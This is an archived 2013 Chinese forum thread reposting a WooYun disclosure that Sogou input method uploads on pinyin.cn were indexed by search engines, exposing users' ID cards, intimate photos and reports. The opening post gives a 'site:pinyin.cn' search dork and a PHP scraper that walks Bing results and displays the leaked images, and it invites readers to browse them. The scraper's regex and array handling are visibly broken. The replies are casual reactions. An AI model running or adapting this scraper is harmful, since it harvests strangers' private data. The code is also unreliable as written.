搜狗输入法泄密事件，导致大量用户敏感信息泄露

coldsea 发表于 2013-6-5 18:29:01

本帖最后由 coldsea 于 2013-6-5 19:07 编辑

http://www.wooyun.org/bugs/wooyun-2013-023081
这是原帖，镇长@乌云

下午发现微博疯传搜狗输入法泄密事件，网友们已经挖出了大量敏感 & 成年内容！

其实该漏洞乌云很久之前就接到了白帽子的报告，并且及时通知了厂商，但问题至今未得到有效的处理。搜狗输入法可导致大量用户敏感信息泄露
http://t1.qpic.cn/mblogpic/37422342bab9b8f8e82a/2000.jpg

http://t1.qpic.cn/mblogpic/206dd2e4b6b228c91602/2000.jpg
http://t1.qpic.cn/mblogpic/14374a47fad619d4530e/2000.jpg
http://t1.qpic.cn/mblogpic/7c8bffd207b51e52da4a/2000.jpg
http://t1.qpic.cn/mblogpic/2966060c59e1f5974136/2000.jpg
http://t1.qpic.cn/mblogpic/eb25e0358c97aec77838/2000.jpg
http://t1.qpic.cn/mblogpic/5929a03d545956704dbc/2000.jpg
http://t1.qpic.cn/mblogpic/7a62cf18fb508cb2a828/2000.jpg
甚至还有部分成年音频流出

http://t1.qpic.cn/mblogpic/e6e657f6a1678adfdf9a/2000.jpg

漏洞证明：为了验证方便，写了一段代码这个是针对bing的结果弄的。

直接这种形式去查看吧，挺方便还支持翻页哦亲！

<?php
set_time_limit(0);
$url = 'http://cn.bing.com/search?q=site%3apinyin.cn&qs=n&pq=site%3apinyin.cn&sc=0-4&sp=-1&sk=&first={ddddd}1&FORM=PERE';

$i = $_GET['i'];
   $api = file_get_contents(str_replace('{ddddd}',$i,$url));
   preg_match_all('/<a href=\"http:\/\/pinyin.cn\/(+)?\"/',$api,$a);
   foreach($a as $v) {
            $api = file_get_contents('http://pinyin.cn/'.$v);
            preg_match('/<a target="_blank" href="(.*?)">/',$api,$aa);
            if($aa) {
                     echo '<br>';
                     echo '<a target="_blank" href="http://pinyin.cn/'.$v.'">http://pinyin.cn/'.$v.'</a>:';
                     echo '<img class=\'round_img\' id=\'round_img\' src="'.$aa.'" border=0 max-width="210px" max-height="210px" />';

            }
}
修复方案：短信发送时可以带一组查看码(如4位字符)，打开链接时输入查看码才能查看内容。

漏洞详情披露状态：
2013-05-04：细节已通知厂商并且等待厂商处理中
2013-05-05：厂商已经确认，细节仅向厂商公开
2013-05-15：细节向核心白帽子及相关领域专家公开
2013-05-25：细节向普通白帽子公开
2013-06-04：细节向实习白帽子公开
2013-06-05：细节向公众公开
简要描述：搜狗输入法信息发送过程存储了相对应的信息在云端，但由于相应配置及其他原因造成会话信息【图片、视频、音频】泄露。其中很多身份证、果照、还有检举信！！！详细说明：搜狗输入法信息发送过程存储了相对应的信息，由于不严谨造成信息被搜索引擎抓取。

Google或者bing：

输入关键词：site:pinyin.cn

,

Geass-CC 发表于 2013-6-5 18:38:54

{:1_81:}无语了

phoenixx 发表于 2013-6-5 18:48:24

拒绝输入法联网。

AOE青云 发表于 2013-6-5 18:56:15

{:7_748:}，不是吧

SuperEVA 发表于 2013-6-5 18:56:25

该文件已过期

coldsea 发表于 2013-6-5 18:58:37

Geass-CC 发表于 2013-6-5 18:38 static/image/common/back.gif
无语了

{:7_857:}哈哈，你是不是也输入了照片啥的

coldsea 发表于 2013-6-5 18:59:35

phoenixx 发表于 2013-6-5 18:48 static/image/common/back.gif
拒绝输入法联网。

come on 除非五笔输入法，拼音输入法联网绝对效率要高一大捷

scorpin 发表于 2013-6-5 19:00:12

我去，各种猛图。国人的东西以后真得慎重选择了……。

coldsea 发表于 2013-6-5 19:00:30

AOE青云发表于 2013-6-5 18:56 static/image/common/back.gif
，不是吧

已经很火了
http://www.wooyun.org/bugs/wooyun-2013-023081

欢腾的小螃蟹 发表于 2013-6-5 19:17:15

这也有啊{:7_714:}

sexy8866 发表于 2013-6-5 19:20:23

什么情况啊？

0west0 发表于 2013-6-5 19:20:48

怎么信息到处都不能得到保全呢

sexy8866 发表于 2013-6-5 19:23:13

0west0 发表于 2013-6-5 19:20 static/image/common/back.gif
怎么信息到处都不能得到保全呢

我看不懂啊

sexy8866 发表于 2013-6-5 19:23:20

0west0 发表于 2013-6-5 19:20 static/image/common/back.gif
怎么信息到处都不能得到保全呢

说什么啊

queen 发表于 2013-6-5 19:33:33

从来不用什么搜狗{:7_742:}

jackiechan@2 发表于 2013-6-5 19:46:25

搜狗还是可以的，不过一输入法搞什么语音，多媒体传送
多余东东一概不用

8888331w 发表于 2013-6-5 19:46:42

什么情况啊？???{:7_725:}

sgyanj_r4w 发表于 2013-6-5 19:47:31

什么意思啊？我现在用的QQ拼音

小三班 发表于 2013-6-5 19:47:59

输入法还连个P网

叶影漂泊 发表于 2013-6-5 19:49:43

{:7_714:} 这个。。。

页: [1] 2 3

隔壁网's Archiver

搜狗输入法泄密事件，导致大量用户敏感信息泄露